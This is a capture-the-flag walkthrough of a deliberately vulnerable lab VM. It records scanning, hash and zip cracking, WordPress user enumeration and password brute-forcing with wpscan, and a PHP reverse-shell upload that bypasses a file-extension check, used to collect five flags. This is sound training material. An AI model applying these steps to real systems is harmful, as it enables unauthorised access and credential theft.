Description :-
The Callahan Auto company has finally entered the world of modern technology and stood up a Web server for their customers to use for ordering brake pads.
Unfortunately, the site just went down and the only person with admin credentials is Tom Callahan Sr. — who just passed away! And to make matters worse, the only other guy with knowledge of the server just quit! This vm machine for oscp level
Run the netdiscover tool
# netdiscover
Nmap Result for All Ports Scan
nmap -A -p- -T4 192.168.56.121
Starting Nmap 7.92 ( https://nmap.org ) at 2022–11–14 15:06 IST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using — system-dns or specify valid servers with — dns-servers
Nmap scan report for 192.168.56.121
Host is up (0.00055s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a0:ca:62:ce:f6:7e:ae:8b:62:de:0b:db:21:3f:b0:d6 (RSA)
| 256 46:6d:4b:4b:02:86:89:27:28:5c:1d:87:10:55:3d:59 (ECDSA)
|_ 256 56:9e:71:2a:a3:83:ff:63:11:7e:94:08:dd:28:1d:46 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 4 disallowed entries
| /6packsofb…soda /lukeiamyourfather
|_/lookalivelowbridge /flag-numero-uno.txt
|_http-title: Welcome to Callahan Auto
|_http-server-header: Apache/2.4.18 (Ubuntu)
8008/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: KEEP OUT
|_http-server-header: Apache/2.4.18 (Ubuntu)
65534/tcp open ftp ProFTPD
MAC Address: 08:00:27:30:25:D0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2–4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelEnumeration : -
Fuzzing the Site Port 80
ffuf -u http://192.168.56.121/FUZZ -w /usr/share/wordlists/dirb/common.txt -c -e .txt,.php,.zip,.bak -fc 301
/’___\ /’___\ /’___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/v1.3.1 Kali Exclusive ❤
________________________________________________:: Method : GET
:: URL : http://192.168.56.121/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Extensions : .txt .php .zip .bak
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response status: 301
________________________________________________big.txt [Status: 200, Size: 184073, Words: 21, Lines: 20470]
cgi-bin/ [Status: 200, Size: 745, Words: 52, Lines: 16]
cgi-bin/.php [Status: 403, Size: 301, Words: 22, Lines: 12]
index.html [Status: 200, Size: 1176, Words: 164, Lines: 18]
robots.txt [Status: 200, Size: 132, Words: 6, Lines: 6]
robots.txt [Status: 200, Size: 132, Words: 6, Lines: 6]
server-status [Status: 403, Size: 302, Words: 22, Lines: 12]
Going to http://192.168.56.121/
Check the Page ViewSource . Find the interesting contents
Contents of robots.txt file
Content of flag-numero-uno.txt file
Flag 1 : B34rcl4ws
Goto this link https://www.youtube.com/watch?v=VUxOd4CszJ8
Find the Some interesting words
I try to this name prehistoric forest . search as directory name /prehistoricforest
Goto /prehistoricforest Directory
I try to richard name. Try to /richard Directory
Visite the this directory http://192.168.56.121/richard/ . Find the some Interesting file and download.
Let’s Run the exiftool
Find the md5 hash
hash : ce154b5a8e59c89732bc25d6a2e6b90b
Crack the Hash for Online
Cracked Hash : spanky
Let’s Login those Credentials
Within the blog, we find a post by Tom Jr asking what the password to the password protected post is. On this post, there is a comment by richard, telling Tom Jr to check out the /richard folder on the server.
Looking through the other posts, there is a mention of another path thisisthesecondflagyayyou.txt. Browsing to this file, we get our second flag!
Content of thisisthesecondflagyayyou.txt
http://192.168.56.121/prehistoricforest/thisisthesecondflagyayyou.txt
Flag 2 : Z4l1nsky
FTP UserName : nickburns try to some password : nickburns
Login to FTP service Port 65534
Let’s Check the all files and directory
Let’s Check the Content of readme.txt File
Let’s Check the port 8008
Visite the iphone user-agent and i already find /NickIzL33t directory.
Directory Brute-Force
After a search with the out-of-the-box wordlist, I get zero hits (past the index.html file). After trying a number of other medium sized word lists, I come back with absolutely zero new hits. As a last hope, I switch to the huge rockyou wordlist - time to make a coffee.
A number of hours later, and check the output from dirsearch, and find hundreds of "matches". Not all of the have a 200 status code, and only one of the 200 status code matches actually has something of interest. /fallon1.html
Visite the fallon1.html page
http://192.168.56.121:8008/NickIzL33t/fallon1.html
Content of hint.txt file
http://192.168.56.121:8008/NickIzL33t/hint.txt
Content of flagtres.txt file
Flag 3 : TinyHead
Download the t0msp4ssw0rdz.zip file . This file password protected
Create a password file for crunch tool
crunch 13 13 -t bev,%%@@¹⁹⁹⁵ -o tommy.txt
Crunch will now generate the following amount of data: 812011200 bytes
774 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 58000800
crunch: 100% completed generating output
zip file hash store another file
zip2john t0msp4ssw0rdz.zip > hash
ver 2.0 efh 5455 efh 7875 t0msp4ssw0rdz.zip/passwords.txt PKZIP Encr: TS_chk, cmplen=332, decmplen=641, crc=DF15B771 ts=9AAD cs=9aad type=8
Crack the Hash
I Create password file already
john -w=tommy.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Press ‘q’ or Ctrl-C to abort, almost any other key for status
bevH00tr$1995 (t0msp4ssw0rdz.zip/passwords.txt)
1g 0:00:00:27 DONE (2022–11–15 12:33) 0.03624g/s 566600p/s 566600c/s 566600C/s bevH00tq{1995..bevH00ts`1995
Use the “ — show” option to display all of the cracked passwords reliably
Session completed.
Password : bevH00tr$1995
Unzip the t0msp4ssw0rdz.zip file
Contents of passwords.txt file
Sandusky Banking Site
— — — — — — — — — — — —
Username: BigTommyC
Password: moneyTheKnot.com (wedding site)
— — — — — — — — — — — — — -
Username: TomC
Password: weddingCallahan Auto Server
— — — — — — — — — — — — — —
Username: bigtommysenior
Password: fatguyinalittlecoatNote: after the “fatguyinalittlecoat” part there are some numbers, but I don’t remember what they are.
However, I wrote myself a draft on the company blog with that information.Callahan Company Blog
— — — — — — — — — — — — — —
Username: bigtom(I think?)
Password: ???
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.
Website is runing for wordpress .
I try to Brute-Force a UserName
wpscan — url http://192.168.56.121/prehistoricforest/ -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | ‘_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan Team
Version 3.8.20
Sponsored by Automattic — https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________[+] URL: http://192.168.56.121/prehistoricforest/ [192.168.56.121]
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%[+] XML-RPC seems to be enabled: http://192.168.56.121/prehistoricforest/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| — http://codex.wordpress.org/XML-RPC_Pingback_API
| — https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| — https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| — https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| — https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/[+] WordPress readme found: http://192.168.56.121/prehistoricforest/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%[+] The external WP-Cron seems to be enabled: http://192.168.56.121/prehistoricforest/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| — https://www.iplocation.net/defend-wordpress-from-ddos
| — https://github.com/wpscanteam/wpscan/issues/1299[+] WordPress version 4.5.3 identified (Insecure, released on 2016–06–21).
| Found By: Rss Generator (Passive Detection)
| — http://192.168.56.121/prehistoricforest/index.php/feed/, <generator>https://wordpress.org/?v=4.5.3</generator>
| — http://192.168.56.121/prehistoricforest/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.5.3</generator>[+] WordPress theme in use: twentysixteen
| Location: http://192.168.56.121/prehistoricforest/wp-content/themes/twentysixteen/
| Last Updated: 2022–05–24T00:00:00.000Z
| Readme: http://192.168.56.121/prehistoricforest/wp-content/themes/twentysixteen/readme.txt
| [!] The version is out of date, the latest version is 2.7
| Style URL: http://192.168.56.121/prehistoricforest/wp-content/themes/twentysixteen/style.css?ver=4.5.3
| Style Name: Twenty Sixteen
| Style URI: https://wordpress.org/themes/twentysixteen/
| Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead …
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| — http://192.168.56.121/prehistoricforest/wp-content/themes/twentysixteen/style.css?ver=4.5.3, Match: ‘Version: 1.2’[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs — Time: 00:00:01 <================================================================> (10 / 10) 100.00% Time: 00:00:01[i] User(s) Identified:
[+] tommy
| Found By: Author Posts — Author Pattern (Passive Detection)
| Confirmed By:
| Author Id Brute Forcing — Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)[+] richard
| Found By: Author Posts — Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing — Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)[+] tom
| Found By: Author Posts — Author Pattern (Passive Detection)
| Confirmed By:
| Author Id Brute Forcing — Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)[+] Tom Jr.
| Found By: Rss Generator (Passive Detection)[+] Big Tom
| Found By: Rss Generator (Passive Detection)[+] michelle
| Found By: Author Id Brute Forcing — Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
Password Brute-Force
wpscan — url http://192.168.56.121/prehistoricforest/ -U tom -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | ‘_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan Team
Version 3.8.20
Sponsored by Automattic — https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%[+] XML-RPC seems to be enabled: http://192.168.56.121/prehistoricforest/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| — http://codex.wordpress.org/XML-RPC_Pingback_API
| — https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| — https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| — https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| — https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/[+] WordPress readme found: http://192.168.56.121/prehistoricforest/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%[+] The external WP-Cron seems to be enabled: http://192.168.56.121/prehistoricforest/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| — https://www.iplocation.net/defend-wordpress-from-ddos
| — https://github.com/wpscanteam/wpscan/issues/1299[+] WordPress version 4.5.3 identified (Insecure, released on 2016–06–21).
| Found By: Rss Generator (Passive Detection)
| — http://192.168.56.121/prehistoricforest/index.php/feed/, <generator>https://wordpress.org/?v=4.5.3</generator>
| — http://192.168.56.121/prehistoricforest/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.5.3</generator>[+] WordPress theme in use: twentysixteen
| Location: http://192.168.56.121/prehistoricforest/wp-content/themes/twentysixteen/
| Last Updated: 2022–05–24T00:00:00.000Z
| Readme: http://192.168.56.121/prehistoricforest/wp-content/themes/twentysixteen/readme.txt
| [!] The version is out of date, the latest version is 2.7
| Style URL: http://192.168.56.121/prehistoricforest/wp-content/themes/twentysixteen/style.css?ver=4.5.3
| Style Name: Twenty Sixteen
| Style URI: https://wordpress.org/themes/twentysixteen/
| Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead …
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| — http://192.168.56.121/prehistoricforest/wp-content/themes/twentysixteen/style.css?ver=4.5.3, Match: ‘Version: 1.2’[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups — Time: 00:00:02 <===============================================================> (137 / 137) 100.00% Time: 00:00:02[i] No Config Backups Found.
[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] — tom / tomtom1
Trying tom / tomtom1 Time: 00:16:55 < > (24665 / 14369057) 0.17% ETA: ??:??:??[!] Valid Combinations Found:
| Username: tom, Password: tomtom1[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
Exploit
Exploit the Site
Let’s Login the Site UserName: tom Password: tomtom1
Click the Posts > All Posts
Let’s check the Draft
Let’s login using the username and password (with merging 1938!!) of bigtommysenior.
And those credentials worked! Password first part credentials already find
UserName : bigtommysenior
Password : fatguyinalittlecoat1938!!
Let’s check the all files and directories
Find the Flag
Flag 4 : EditButton
Let’s check the root directery files /
Find the New directory for /NickIzL33t
Visite this url > http://192.168.56.121:8008/NickIzL33t/P4TCH_4D4MS and change the user-agent Like IOS
Let’s Upload the php Reverse shell and this request intercept for burp-suite
Let’s change the request
Let’s change the .gif extension .php
Let’s Run the netcat Listener
Let’s visited this URL > http://192.168.56.121:8008/NickIzL33t/P4TCH_4D4MS/uploads/php-reverse-shell.php
Let’s check the .5.txt file contents
Flag 5 : Buttcrack
Marge the All Flags :: B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack
This Flags password for LOOT.zip file
Contents of THE-END.txt file
Final Thoughts
Loved this VM, very well done some fun quality hacks and very well themed. I’ll play more of these for sure. The only gotcha I’d have is not having taken into account the year the movie came out for the WordPress dates, but that is so minor and insignificant.
